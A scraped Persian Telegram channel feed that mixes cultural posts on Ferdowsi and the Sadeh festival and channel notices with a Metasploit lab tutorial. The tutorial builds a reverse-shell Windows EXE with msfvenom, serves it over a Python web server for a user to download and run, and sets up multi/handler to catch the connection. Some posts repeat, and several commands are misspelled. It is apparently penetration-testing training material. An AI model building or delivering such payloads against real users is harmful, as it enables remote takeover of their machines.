۱ بهمن ماه زادروز فردوسی گرامی باد.
اول بهمن ماه سال ۳۱۹ هجری شمسی، روزی است که در آن «حکیم ابوالقاسم فردوسی» حکیم سخن، حکیم توس و استاد سخن پا به عرصه وجود گذاشت.
«ابوالقاسم حسن پور علی طوسی» معروف به فردوسی در روستای پاژ در شهرستان از توابع طبران توس در خراسان دیده به جهان گشود. نام او همه جا ابوالقاسم فردوسی شناخته شده است. پدرش از دهقانان طوس بود که ثروت و موقعیت قابل توجهی داشت. وی از همان زمان که به کسب علم و دانش می پرداخت، به خواندن داستان هم علاقهمند شد.
همان طور که در زندگینامه فردوسی آمده است، آغاز زندگی وی هم زمان با گونهای جنبش نوزایش در میان ایرانیان بود که از سده سوم هجری آغاز شده و دنباله و اوج آن به سده چهارم رسید. فردوسی از همان روزگار کودکی بیننده کوششهای مردم پیرامونش برای پاسداری ارزشهای دیرینه بود و خود نیز در چنان زمانه و زمینهای پا به پای بالندگی جسمی به فرهیختگی رسید و رهرو سختگام همان راه شد.
فردوسی از همان ابتدای کار که به کسب علم و دانش پرداخت، به خواندن داستان هم علاقهمند شد و مخصوصا به تاریخ و اطلاعات مربوط به گذشته ایران عشق میورزید. همین علاقه به داستانهای کهن بود که او را به فکر به نظم درآوردن شاهنامه انداخت.
@TryHackBox
اول بهمن ماه سال ۳۱۹ هجری شمسی، روزی است که در آن «حکیم ابوالقاسم فردوسی» حکیم سخن، حکیم توس و استاد سخن پا به عرصه وجود گذاشت.
«ابوالقاسم حسن پور علی طوسی» معروف به فردوسی در روستای پاژ در شهرستان از توابع طبران توس در خراسان دیده به جهان گشود. نام او همه جا ابوالقاسم فردوسی شناخته شده است. پدرش از دهقانان طوس بود که ثروت و موقعیت قابل توجهی داشت. وی از همان زمان که به کسب علم و دانش می پرداخت، به خواندن داستان هم علاقهمند شد.
همان طور که در زندگینامه فردوسی آمده است، آغاز زندگی وی هم زمان با گونهای جنبش نوزایش در میان ایرانیان بود که از سده سوم هجری آغاز شده و دنباله و اوج آن به سده چهارم رسید. فردوسی از همان روزگار کودکی بیننده کوششهای مردم پیرامونش برای پاسداری ارزشهای دیرینه بود و خود نیز در چنان زمانه و زمینهای پا به پای بالندگی جسمی به فرهیختگی رسید و رهرو سختگام همان راه شد.
فردوسی از همان ابتدای کار که به کسب علم و دانش پرداخت، به خواندن داستان هم علاقهمند شد و مخصوصا به تاریخ و اطلاعات مربوط به گذشته ایران عشق میورزید. همین علاقه به داستانهای کهن بود که او را به فکر به نظم درآوردن شاهنامه انداخت.
@TryHackBox
کجارو
فردوسی کیست | زندگینامه + آثار و اشعار - کجارو
فردوسی شاعر حماسه سرای بلند آوازه ایرانی در قرنهای چهار و پنج هجری است. شاهنامه فردوسی مهمترین اثر حماسی ایران و بخشی از هویت فرهنگی ایران به شمار میرود.
🔥5👍1
دوستان بدلیل اینکه از شما عزیزان در سطح های مختلف هستید تصمیم گرفتم یک بخش از کانال را آموزش های پایه Lpic1 و Lpic2 و Net+ و CCNA , CCNP , MCSA , MCSE اضافه بشه ولی برای عدم سردرگمی شما عزیزان یک کانال و گروه جدا تهیه کردیم در کانال زیر عضو شید و به پشتیبانی ما پیام بدید تا لینک و گروه برای شما عزیزان ارسال شود .
@TryHackBox_Network
💢 ظرفیت 100 نفر .
امشب دوره Lpic1 جادی اپلود خواهد شد تا آموزش و کتاب خودمان آماده بشود .
موقتا به بات کانال برای عضویت پیام بدهید .
@Unique_exploitBot
@TryHackBox
@TryHackBox_Network
💢 ظرفیت 100 نفر .
امشب دوره Lpic1 جادی اپلود خواهد شد تا آموزش و کتاب خودمان آماده بشود .
موقتا به بات کانال برای عضویت پیام بدهید .
@Unique_exploitBot
@TryHackBox
👍3
Forwarded from PFK Git
#pentest #bugbounty
راهنمای تست امنیت Firestore: هر چیزی که یک پنتستر، توسعهدهنده و معمار باید بداند.
https://michael-yer.medium.com/firestore-security-testing-guide-go-beyond-firebaseio-com-json-69715891a51d
@Pfk_git
راهنمای تست امنیت Firestore: هر چیزی که یک پنتستر، توسعهدهنده و معمار باید بداند.
https://michael-yer.medium.com/firestore-security-testing-guide-go-beyond-firebaseio-com-json-69715891a51d
@Pfk_git
Medium
Firestore Security Testing Guide — Go Beyond *.firebaseio.com/.json
This article explains Firestore security aspects and gives you a code examples to test Firestore for security issues.
Media is too big
VIEW IN TELEGRAM
داستان جشن ملی سده
به روایت
گوهرنازبانو پشوتنی
جشن پیدایش آتش وچهل روزگی خورشیدخجسته باد
🔥
#آتش
#گهرنازپشوتنی
#سده
#هویت_ایرانی
#آموزش_کودکان
#آوند
#جشنسده
@TryHackBox
به روایت
گوهرنازبانو پشوتنی
جشن پیدایش آتش وچهل روزگی خورشیدخجسته باد
🔥
#آتش
#گهرنازپشوتنی
#سده
#هویت_ایرانی
#آموزش_کودکان
#آوند
#جشنسده
@TryHackBox
🔥2👍1
دوستانی که به زبان انگلیسی تسلط دارند پیام بدند یک پیشنهاد دارم واسشون :
@Unique_exploitBot
یا
@Thb_Support
@Unique_exploitBot
یا
@Thb_Support
مرحله 1: ساخت فایل مخرب
msfvenom
را با گزینه -help اجرا کنید تا بتوانید خلاصه مختصری از نحو آن را دریافت کنید. برای استفاده از ابزار، باید پیلود مورد نظر خود را با فلگ -p مشخص کنید، لیستی از متغیرها برای آن payload (شامل شماره پورت به وصل شوید)، و فرمت پیلودی که می خواهید (از جمله EXE، که با -f exe مشخص می کنید):
به نتایج msfvenom -help نگاه کنید.
#Metasploit
@TryHackBox
msfvenom
را با گزینه -help اجرا کنید تا بتوانید خلاصه مختصری از نحو آن را دریافت کنید. برای استفاده از ابزار، باید پیلود مورد نظر خود را با فلگ -p مشخص کنید، لیستی از متغیرها برای آن payload (شامل شماره پورت به وصل شوید)، و فرمت پیلودی که می خواهید (از جمله EXE، که با -f exe مشخص می کنید):
به نتایج msfvenom -help نگاه کنید.
#Metasploit
@TryHackBox
👍5🔥2👎1
حالا msfvenom را اجرا کنید تا windows/shell/reverse_tcp به یک فایل مستقل تبدیل شود. وقتی اجرا شد، میخواهید این پیلود به دستگاه لینوکس شما متصل شود، بنابراین باید LHOST (که محلی میزبان است) را به آدرس IP لینوکس خود پیکربندی کنید تا دوباره به شما متصل شود. پورت محلی را برای اتصال به عقب (LPORT) روی 9999 تنظیم کنید. در نهایت، یک -f exe را در انتهای لیست موارد برای msfvenom قرار دهید. این به آن میگوید که یک فایل با فرمت EXE ویندوز ایجاد کند. ابزار msfvenom به سادگی فایل مخرب را در خروجی استاندارد نمایش می دهد، بنابراین فایل مخرب حاصل را به سیستم فایل خود در /tmp/file.exe هدایت کنید.
👍1
چالش: از msfvenom برای تبدیل windows/sheii/reverse tcp payload به یک فایل اجرایی مستقل استفاده کنید. شما باید LPORT و LHOST را تنظیم کنید.
اندازه of file.exe را بررسی کنید. باید بسیار نزدیک به 73802 بایت باشد (اگرچه ممکن است یک یا دو بایت بزرگتر باشد):
Is -1 /tmp/file.exe
اگر /tmp/file.exe 73802 بایت نیست (احتمالاً به اضافه یک یا دو بایت)، آن را حذف کنید (با rm /tmp/file.exe)، سینتکس خود را از نظر msfvenom دوباره بررسی کنید، و دوباره ایجاد کنید.
#Metasploit
@TryHackBox
Is -1 /tmp/file.exe
اگر /tmp/file.exe 73802 بایت نیست (احتمالاً به اضافه یک یا دو بایت)، آن را حذف کنید (با rm /tmp/file.exe)، سینتکس خود را از نظر msfvenom دوباره بررسی کنید، و دوباره ایجاد کنید.
#Metasploit
@TryHackBox
👍1
مرحله 2: فایل را از لینوکس Serve کنید
یک وب سرور لینوکس را پیکربندی کنید تا محتویات دایرکتوری /tmp شما (شامل fiie.exe) را ارائه دهد.
حالا cdرا وارد دایرکتوری کنید که می خواهید محتوای آن از طریق HTTP ارائه شود. سپس مفسر پایتون را اجرا کنید تا ماژولی به نام http,server , listening on TCP 8000 port 8000 (پیشفرض) فراخوانی شود:
$ cd /tmp/
/tmp$ python -m http.server
با اجرای http.server در یک پنجره، اکنون به مرحله 3 می رویم و msfconsole Metasploit را فراخوانی و پیکربندی می کنیم.
#Metasploit
@TryHackBox
یک وب سرور لینوکس را پیکربندی کنید تا محتویات دایرکتوری /tmp شما (شامل fiie.exe) را ارائه دهد.
حالا cdرا وارد دایرکتوری کنید که می خواهید محتوای آن از طریق HTTP ارائه شود. سپس مفسر پایتون را اجرا کنید تا ماژولی به نام http,server , listening on TCP 8000 port 8000 (پیشفرض) فراخوانی شود:
$ cd /tmp/
/tmp$ python -m http.server
با اجرای http.server در یک پنجره، اکنون به مرحله 3 می رویم و msfconsole Metasploit را فراخوانی و پیکربندی می کنیم.
#Metasploit
@TryHackBox
👍1
مرحله 3: msfconsole را پیکربندی کنید
یک پنجره ترمینال دیگر را باز کنید! در این پنجره ترمینال دوم (جدا از شما
دستور http.server)، برنامه msfconsole را فراخوانی کنید.
msfconsole
در اعلان msf، دستورات را به صورت تعاملی به متاسپلویت صادر کنید. به آن بگویید تمام ماژول های اکسپلویت را که در دسترس است نشان دهد.
#Metasploit
@TryHackBox
یک پنجره ترمینال دیگر را باز کنید! در این پنجره ترمینال دوم (جدا از شما
دستور http.server)، برنامه msfconsole را فراخوانی کنید.
msfconsole
در اعلان msf، دستورات را به صورت تعاملی به متاسپلویت صادر کنید. به آن بگویید تمام ماژول های اکسپلویت را که در دسترس است نشان دهد.
#Metasploit
@TryHackBox
متاسپلویت دارای بیش از 2000 اکسپلویت مختلف برای انواع نقص های نرم افزاری مختلف است.
ما از expioit/muiti/handier استفاده می کنیم که به اختصار multi/handler نیز شناخته می شود. دستور info در msfconsole میتواند در هر زمان برای کسب اطلاعات بیشتر در مورد هزاران ماژول در متاسپلویت، از جمله اکسپلویتها، پیلودها، ماژولهای کمکی و غیره استفاده شود. خروجی خلاصهای مفید از استفاده از ماژول، متغیرهای آن، و گزینه های دیگر برای پیکربندی آن
از دستور info برای دریافت اطلاعات بیشتر در مورد multi/handler استفاده کنید.
ما از expioit/muiti/handier استفاده می کنیم که به اختصار multi/handler نیز شناخته می شود. دستور info در msfconsole میتواند در هر زمان برای کسب اطلاعات بیشتر در مورد هزاران ماژول در متاسپلویت، از جمله اکسپلویتها، پیلودها، ماژولهای کمکی و غیره استفاده شود. خروجی خلاصهای مفید از استفاده از ماژول، متغیرهای آن، و گزینه های دیگر برای پیکربندی آن
از دستور info برای دریافت اطلاعات بیشتر در مورد multi/handler استفاده کنید.
👍1
برای multi/handler، به توضیحات توجه کنید: "این ماژول یک stub است که تمام فیچر های متاسپلویت پیلود سیستم را برای اکسپلویت هایی که خارج از چارچوب راه اندازی شده اند، ارائه می دهد". پس از پیکربندی multi/handler، ما از یک کاربر خواهیم داشت که فایل مخرب ما را با استفاده از یک مرورگر دانلود کرده و آن را به صورت دستی اجرا می کند (بنابراین آن را خارج از چارچوب راه اندازی می کند). برنامه file.exe دوباره به multi/handler متصل می شود، جایی که ما آن را کنترل می کنیم.
ما می توانیم از multi/handler برای منتظر ماندن برای اتصال از file.exe استفاده کنیم.
از دستور use برای انتخاب multi/handler استفاده کنید.
ما می توانیم از multi/handler برای منتظر ماندن برای اتصال از file.exe استفاده کنیم.
از دستور use برای انتخاب multi/handler استفاده کنید.
msf5 > use exploit/multi/handler
درخواست شما کانتکست را برای گفتن msf5 exploit(multi/handler) تغییر می دهد > . این به شما میگوید که msfconsole زمینه ماژول خاص اکنون در حال اجرا است. اکنون میتوانیم تمام پیلودهای پرداختی را که با اکسپلویت انتخابی ما سازگار هستند، با اجرا مشاهده کنیم:
msf5 exploit(multi/handler) > show payloads
اگر این لیست را بررسی کنید، خواهید دید که windows/shell/reverse_tcp یکی از payloadهایی است که با اکسپلویت multi/handler کار می کند. این همان چیزی است که از آن استفاده خواهیم کرد تا با پیلود فایل file.exe که قبلاً ایجاد کردیم مطابقت داشته باشد.
از دستور set برای تنظیم گزینه PAYLOAD روی windows/shell/reverse_tcp استفاده کنید.
msf5 exploit(multi/handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
درخواست شما کانتکست را برای گفتن msf5 exploit(multi/handler) تغییر می دهد > . این به شما میگوید که msfconsole زمینه ماژول خاص اکنون در حال اجرا است. اکنون میتوانیم تمام پیلودهای پرداختی را که با اکسپلویت انتخابی ما سازگار هستند، با اجرا مشاهده کنیم:
msf5 exploit(multi/handler) > show payloads
اگر این لیست را بررسی کنید، خواهید دید که windows/shell/reverse_tcp یکی از payloadهایی است که با اکسپلویت multi/handler کار می کند. این همان چیزی است که از آن استفاده خواهیم کرد تا با پیلود فایل file.exe که قبلاً ایجاد کردیم مطابقت داشته باشد.
از دستور set برای تنظیم گزینه PAYLOAD روی windows/shell/reverse_tcp استفاده کنید.
msf5 exploit(multi/handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
وقتی file.exe را ساختیم، به msfvenom گفتیم که یک فایل EXE مخرب با استفاده از همین پیلود (windows/shell/reveise_tcp) بسازد. جالب است بدانید که اگر فایل مخربی مانند file.exe را با پیلودی متفاوت از پیلودی که با استفاده از multi/handler در msfconsole ارسال می کنیم پیکربندی کنیم، پیلود ارسال شده توسط multi/handler اولویت دارد! فایل مخرب ایجاد شده توسط متاسپلویت (مانند file.exe) یک پیلود متفاوت از مولتی/هندلر دریافت میکند که با آن پیلود متفاوت ساخته شده است و اجرا میکند، و هر یک از قابلیتهای payload خودش را نادیده میگیرد. با این حال، برای این آزمایشگاه، از همان payload در multi/handler استفاده خواهیم کرد که در file.exe با msfvenom استفاده کردیم. بیشتر پنتسترها از یک پیلود استفاده می کنند، بنابراین این همان کاری است که ما در اینجا انجام خواهیم داد.
پس از انتخاب یک پیلود، به تمام گزینههایی که میتوانید با اجرای گزینههای show options کنید، نگاه کنید.
#metasploit
@TryHackBox
پس از انتخاب یک پیلود، به تمام گزینههایی که میتوانید با اجرای گزینههای show options کنید، نگاه کنید.
#metasploit
@TryHackBox
دستور show options برخی از گزینههای مهم مانند LHOST و LPORT را نشان میدهد (آدرس IP و شماره پورتی که پیلود تحویل داده شده به آن متصل میشود).
LHOST
را برای payload روی آدرس IP لینوکس خود تنظیم کنید تا وقتی پیلود روی تارگت ویندوز اجرا می شود، payload بتواند دوباره به دستگاه لینوکس شما متصل شود. (دوباره، توجه داشته باشید که اگر آدرس دیگری را در اینجا انتخاب کنیم، میتوانیم LHOST را که در file.exe ساختهایم لغو کنیم، زیرا پیلود multi/handler و پیکربندی آن بر پیلود فایل file.exe لغو میشود. اما ما از همان آدرس آدرس خود استفاده میکنیم. دستگاه لینوکس برای این آزمایشگاه.) LHOST را روی 0. 0 . 0 . 0 تنظیم می کنیم. بنابراین در تمام رابط ها گوش می دهد. در این مورد، فایل payload ما (file.exe) می داند که به کجا متصل شود، زیرا LHOST را با msfvenom ارائه کرده ایم.
LHOST و LPORT را تنظیم کنید، سپس تنظیمات را با show options تأیید کنید.
در شکل زیر خواهید دید
LHOST
را برای payload روی آدرس IP لینوکس خود تنظیم کنید تا وقتی پیلود روی تارگت ویندوز اجرا می شود، payload بتواند دوباره به دستگاه لینوکس شما متصل شود. (دوباره، توجه داشته باشید که اگر آدرس دیگری را در اینجا انتخاب کنیم، میتوانیم LHOST را که در file.exe ساختهایم لغو کنیم، زیرا پیلود multi/handler و پیکربندی آن بر پیلود فایل file.exe لغو میشود. اما ما از همان آدرس آدرس خود استفاده میکنیم. دستگاه لینوکس برای این آزمایشگاه.) LHOST را روی 0. 0 . 0 . 0 تنظیم می کنیم. بنابراین در تمام رابط ها گوش می دهد. در این مورد، فایل payload ما (file.exe) می داند که به کجا متصل شود، زیرا LHOST را با msfvenom ارائه کرده ایم.
LHOST و LPORT را تنظیم کنید، سپس تنظیمات را با show options تأیید کنید.
در شکل زیر خواهید دید
👍2👎1